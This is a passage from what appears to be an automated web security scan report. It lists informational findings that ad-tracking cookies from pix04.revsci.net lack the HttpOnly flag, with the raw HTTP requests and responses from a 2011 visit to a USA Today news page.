Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:20 GMT
Content-Length: 593

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs = ['D08734_72087','D08734_72092','D08734_72131','D08734_72639','D08734_72674','D08734_72685','D08734_72132','D08734_72078','D08734_72122'
...[SNIP]...

11.44. http://pix04.revsci.net/J06575/a4/0/0/pcx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"; rsi_segs_1000000=pUP148mheXIQT7uItGF25jD9QihE8IYbNKetsiW8kgFisncWnhVMqxlWq0ucAHjnyThQpuvVI9kMh8n1FZRZG3xOHqJgzQCOjhUe97Ueo/oV8rFkwdsAM2inFD5dxpd+U+E093xPsrix3+OZNio25HCvnvFhZhWthmBTyPD4RapFCIEu2lOw/IIwYkz+6mxP7SBJDiF24gicYCle3d6HY7QZbkm+odQJLW8+PWrecDnI1ZKZHQzsDKye1ebNlG+F0O7KsVRUWc2lZiRsgG+YnEnhhOgUjCqIi4i4q43MBu7CNjxFeYUhxsnubRYFgIe24n3W85w7P/Po0VHFfykAgOVvK83VaDdZKWD/KIVe8dqKzyeln73lCPFzE9HjxKDwsj/BfiMyOXhh1G8dLTLCbJhGOrlytpc84LHyZP+KVwJJNYdAUHQMimUPLIaj2XtIzdmkiZElC6E3vZ7BWA6vfqDqyz/UN2NTNZCl2XEU5yfs8jUdCq/L6cLps1Tz6jEWB3nM03mUZ7lIOmLJZpYScvQJPNi6Qhp+d6GkBErOgH5qxczpWuDAoetyw48xMGgXARtZi/Z7txvmN3uOVuc5NDiDAySPpWWPnSs=; rtc_8DRJ=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140mheQIMpqaIQFMFxKiG7poa4ScLkSUnuXM5yz7k86fOUkLFRqcJo0UUZKyjTigWJmrc/VPLEk/p83UTC90T3xVW/k94jPzDisxc1qUSPzP1W/5KJ+SuMwS186lIWONYUoRtznhaEp8fJVeEpvQWeVG9EvG7g73n2XzRwkEq30oSxzL21IYncRpB7Vmzy3joSHQ5vGM9VU4VSm5AgWsVYxWk3JS7vRpdayxe8TDsXwUSpQFiYy5pS842/aN9SnRxVGCIP95D87/uDRpu0UmJDYX3l0qRP5BY3b4t7BgLyNwnXHSYYudDVaG4QnEftMpZxTRkqG21q+680BEja/OqvslHejmvsRlOZ7JpFrDGgnxG6RmNPV/VUZ6oaI/7+LgCHZeBf4qFPX4suV/IG+j2+HVc2AnkaVTmZFVq4Wg6IGT7OK7aLdjZWKx36WMViO0RustKJ9k1vcurs9Wb0ktanWk37xrgMXs0OrUvcqyW2aBOTiotobvg9souhsJCPREAxZVNBJYFINIzLz4cU0qJiBxRMTc6+Ma17gKr/ko+8MZoonToCEPsCWPrx5uxMv7a7oGedGSkJGMBROtEbj0gzg==; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:14 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:13 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

11.45. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/235941171.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/235941171.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP140+huHIQDruItGF29/z0a0qdLOaaQnczyWBW6QQ4O3XYuv0liDtqNncA2iFgLyKdDKURNw+S7oQxbOYTHYrKZ2dbvcV56gmyoyU4a2CMf5ovXdEZFcE017Ryqk+7nNFKUlIhPaZaEjzyv5uobKDuejN4W8yhWG/DFPY+M9w2cuecXe9PcpFr0MiJx9yLdq6TTyhSv6PuviC0MN4iKZDkVHzeHcIGMiXdci2bVc4S1cz+9VDmjLExI7RS7MGqqNuya1ss6T2bFacwQP85FS+V6wTdARcJAef2gmv/VTj3x5h4uUd2KuNYX6aHXuiT3h3m8CKB/0AOk9wWBNVPUfegcRyuqIopqk6aDacDhIWbYpka4KxJ5Au6n749iv1R7xCtAEW1joHLhacGq2erlzGy658wn63U+JplcyWh3kMaEJqXxWY+ROvlqSuqXjsCC0qjB/NDXEwTNTA9ZnxJBAIC2mnOSncbDfyTxRILJj3BJHbs5qr7TOO/HZNWacPaSHHs92dfHkKBwBMygq1CPNLMNqgAn9aHt0Xd5asOlVgQ+wMvZGsvN+IiS/oMSjLfugorj+hpz4sT/aI=; rtc_gNkk=MLvn9jM1Jgpr54aeFy58YLrc3TPJXKuUhF+WKpWQ6BT9vtIMiLEgfriSIH+6oN7+gF9hY+HDTba4RTjzA519wkRHZcOAJEo4DQzt2Om/hARoMTcLYKE4b9Mk3IyFloX4lVi/0zObRRfG/BqiXqBUCsu9DR7K8008eZg4eQFvS5MzWThlk8WWNcoC9XDBsIaSi9nd4TH7BLUfaDl5nZIqlDBCeZfsq5IrZg73tkP4E2yiMsBY+NuBZX/1qeiF34a22ee6sDUKIxVpAmcv4nhe0LXvJDdS4iC9TldQnJlW761Iu9PGbayZw9MbzArkTKcIpHM8E+Os9AEPY7O6oRLRFFyxBRbtX2QSKiWNR4VoM+1FCrFdKyVCKiEd38QdLXcycGkOqfOJf5mxNMKGG/62UDrXysoExPPPkaHRyNEHI4ONCijKQeNg4Tprvy8xiEFwV7pUk55r0Uf1rdz5sbPL7rDAOQlrKYryCdPj5wFP0f++d1twsfNbWi2huPm8m9HwoNU954aVSLkceBGu9dZOOeetxqPewEdPxHyIsSaGmEvexjPrrTASD7QsT02gWWSHW6XI18VbNNmdwjIzFNi9N/mKv/c2e8XGnbl1ez0CVJlIRwDHnpB5xxpxtuaL0vbsvZRbeDRddVgKA0cJZNJD8DDM7rUBqzYYszdunVBZVxY0glO22UJOzGb/NDQu0BGtbZfxBLGNlTiP9AO2CFcUcKHFmIJAx1JvsBzyrM313xt+ttLSnlFFRcq7AIRyDyp+Fi3Ya4huqfx/m2rVBVeIPWWLZl9/uf1fJxiZUh24CF0po6s/LTg86FUZaYZX0mjFKIpDqS5VJRc3jo7RApI74eEZL1xDHCxCze1ohFq8jgKcdbQI0CevEfWbM5FfaReCoyHlCaobvF0GYEKHQr2V9hnv35BhxzEI25L5lfm77cKyt8xfrmiQHYpQRzApKVFb3YTmHMKZFZJ64J6V6dDZp+G3p21fv6Dtj/0ZO9hXpY2vSIg/P30WadGL5q4VYNVErOo9p1L3F5Ybowv7Kmvxa0p/j7UyrpFwLWGddArBKxiAY/TVYJh/JMQugWKt3nlJuinIfJ8GKIUGE0jyIIf3iFRaCfSGcDPYJdB8BT/JXEMxKRqqS6DypKcvjzS/tBZUwiCAJFx/9EyC7Y87mcVjmsr+3GbkMQQmeaMgxD0jmFUuKkH02ny91Jb5+VtUPGmjNrdl2KGe9TtIAY3t0ofHQrz6otIYD8qi8HUiWJmdRBsAS6wZPWrTrxM8m8vRALbZxPLLa/Lw/YlHTsMwQ3CyMzERhkgwh7Nwh+Ff3K6N0wPsQRrFWrKJr/04MNRKN8eEmpJxELGcZgeCELAurmuXmhOrwANWiFr6Y5D+Nzh7XaZ5QAjjEHnPx/yzNVRCoPQCBeMc063urg5UAbQDdyBdbr8brehaHtwit48XrkXPxYVmgHeTZBZElWHgm84RIXxtS3oPYdhov2zAM5MjoZfz0kW/1QnUeIEHrIYojONHEGCFUYZbk9fgVO477YrqJm74Ild5/OnZXA5njF+ln1ytVEFTrBYq0oDHk8Ba5wiiEL065y18CXWfM8ucXNv9fbeZ2ooHI8QbxxoTx/uHwt2wpal+Xn30BUwfUt1JmeHJrpCyyzX4qN30Yd9DcYhQ6W47GnbjBcuu+pe+jx1T6sX7nRsFsziOctAgDKvHI0SVIrepM0q5rVA1gwIFolJeC0LGuOJPX6oSxwxzfvFYmR6e0G+eB+TIU0fkTsktG1e7YEC3Z5S3wAzn3TEOymS/ajl80qxtQbfDmRUKB5ZgYZDEQchUlMTjKwzUlZbzvODGAoDkHcyd5gATArIYcBJOivK2FGlFtWBaJQKi/5GQkLoXm9K9n5dvcxVPSw==; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1Nh